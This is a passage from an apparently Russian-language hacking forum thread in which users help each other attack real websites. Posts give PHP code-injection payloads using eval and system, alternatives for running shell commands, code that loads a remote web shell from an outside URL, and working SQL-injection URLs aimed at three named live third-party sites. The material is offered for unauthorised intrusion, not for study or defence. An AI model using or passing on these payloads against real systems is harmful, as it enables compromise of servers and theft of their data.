Старый 05.03.2013, 21:57   #2751
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

/search/?name={${eval($_GET[l])}}&l=phpinfo();
в параметре l любой пхп код

Последний раз редактировалось vp$; 05.03.2013 в 22:19..
vp$ вне форума   Ответить с цитированием
Старый 05.03.2013, 23:47   #2752
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

rogatiy,
Цитата:
Потёрли мою тему злые модераторы, да даже причину сообщить не изволили.
Причина: не уровень форума.
Подробнее: https://rdot.org/forum/announcement.php?f=9
Цитата:
Внимание: Любая тема может быть удалена с форума по критерию "Не уровень форума", а аккаунт заблокирован по критерию "Ах ты негодник!".
Понятно, негодник?

Цитата:
где можно почитать про синтаксис PHP-инъекций в URL?
Ответ: php.net
Цитата:
ибо синтаксиса не знаю.
Вот тут смайлик *рука-лицо*

И совет на будущее - не делай больше так, запасись терпением и просто читай форум. Не пиши пока ничего.
b3 вне форума   Ответить с цитированием
Старый 06.03.2013, 14:18   #2753
rogatiy
 
Регистрация: 04.03.2013
Сообщений: 6
Репутация: 0
По умолчанию

Цитата:
Сообщение от vp$ Посмотреть сообщение
/search/?name={${eval($_GET[l])}}&l=phpinfo();
в параметре l любой пхп код
Запрос name={${eval($_GET[l])}}&l=phpinfo(); выводит результат "ничего не найдено", т.е. инъекция не происходит вообще. Запрос name={${eval(${GET(i)}&i=phpinfo(); выдаёт Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in ..., т.е. инъекция происходит, но криво. Самое странное в том, что на правильное кол-во скобок он ругается на unexpected character, да и на квадратные скобки для [i] тоже. В какую сторону теперь копать? UPD: Действительно, какая-то странная фильтрация, на другом сайте с такой же уязвимостью всё работает.

PHP 5.2.6-1+LENNY16
allow_url_include=Off

PS: b3, http://www.php.net/manual/en/ или http://www.php.net/manual/ru/? Хоть убей, но не нашёл там ничего полезного.

Последний раз редактировалось rogatiy; 06.03.2013 в 14:34..
rogatiy вне форума   Ответить с цитированием
Старый 06.03.2013, 14:59   #2754
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

how about
name={${system($_GET[c])}}&c=id
or
name={${include(php://input)}}
and in POST-
<?system(id);?>
spari вне форума   Ответить с цитированием
Старый 06.03.2013, 16:03   #2755
rogatiy
 
Регистрация: 04.03.2013
Сообщений: 6
Репутация: 0
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
name={${system($_GET[c])}}&c=id
Отключено во имя безопасности, но работает.

Также удалось узнать, что кавычка меняется на \, точка фильтруется и просто удаляется из запроса, т.е. включены magic_quotes, даже инклуд просто так не провести. В общем, треш, угар и содомия. Any more ideas?

Последний раз редактировалось rogatiy; 06.03.2013 в 18:44..
rogatiy вне форума   Ответить с цитированием
Старый 06.03.2013, 19:05   #2756
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Помогите раскрутить пару SQL, у меня их не получилось никак раскрутить:
http://sexoroll.ru/homevideo'%20union%20select%201%20--%201/
Колонка одна, вывода добиться никак не могу, кто поможет буду благодарен.
http://vocabulary.ru/dictionary/30’
Тоже не могу раскрутить, режет пробелы как + так и %20 и /**/, в довесок ко всему режет и нераздельный пробел \xa0(при отправке через php сокеты), а для правильного выполнения запроса пробел то нужен, так как кавычками параметр не обрамлен, но других вариантов я не знаю 
http://www.boardsklad.ru/article-snoubordy/link/vedutshij-snoubordist-rossii-v-distsipline-snoubordinga.php'
Пытаюсь в ошибку, функции extractvalue и updatexml отсутствуют, а способ с floor rand никак не получается присобачить, буду очень признателен за помощь.
netcat вне форума   Ответить с цитированием
Старый 06.03.2013, 21:28   #2757
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

netcat
http://vocabulary.ru/dictionary/(1)and(extractvalue(0x3b,concat(0x3b,(select(versi on())))))

http://sexoroll.ru/homevideo' and 0 union select '3 and 0 union select 1,version()'-- 1/

http://www.boardsklad.ru/article-snoubordy/link/2'and(select*from(select(name_const((select(user() )),1)),name_const((select(user())),1))a)and'

rogatiy
google > curly syntax
~d0s~ вне форума   Ответить с цитированием
Старый 06.03.2013, 21:41   #2758
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от rogatiy Посмотреть сообщение
Отключено во имя безопасности, но работает.

Также удалось узнать, что кавычка меняется на \, точка фильтруется и просто удаляется из запроса, т.е. включены magic_quotes, даже инклуд просто так не провести. В общем, треш, угар и содомия. Any more ideas?
you dont have to use quotes.
if system() is disabled,you can always use exec(),shell_exec(),passthru(),pcntl_exec() or include(expect://command).
if its also not working,you can use
<?file_put_contents(shell.php,file_get_contents(ba se64_decode(encodeofshell.txt)));?>
or
<?eval(file_get_contents($_GET[c]));?> and ?c=http://shell.txt
spari вне форума   Ответить с цитированием
Старый 06.03.2013, 23:10   #2759
rogatiy
 
Регистрация: 04.03.2013
Сообщений: 6
Репутация: 0
По умолчанию

Спасибо! А что делать с фильтрацией точки? copy(site/shell.txt,shell.php) превращается в copy(site/shelltxt,shellphp) и, конечно же, выкидывает ошибку.
PS: Do you use Google Translate or smth like that to translate the forum? You're awesome
rogatiy вне форума   Ответить с цитированием
Старый 08.03.2013, 14:03   #2760
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Подскажите онлайн сервис где это декодировать?

Duplicate entry 'Дмитрий Бердов'
Flakt вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot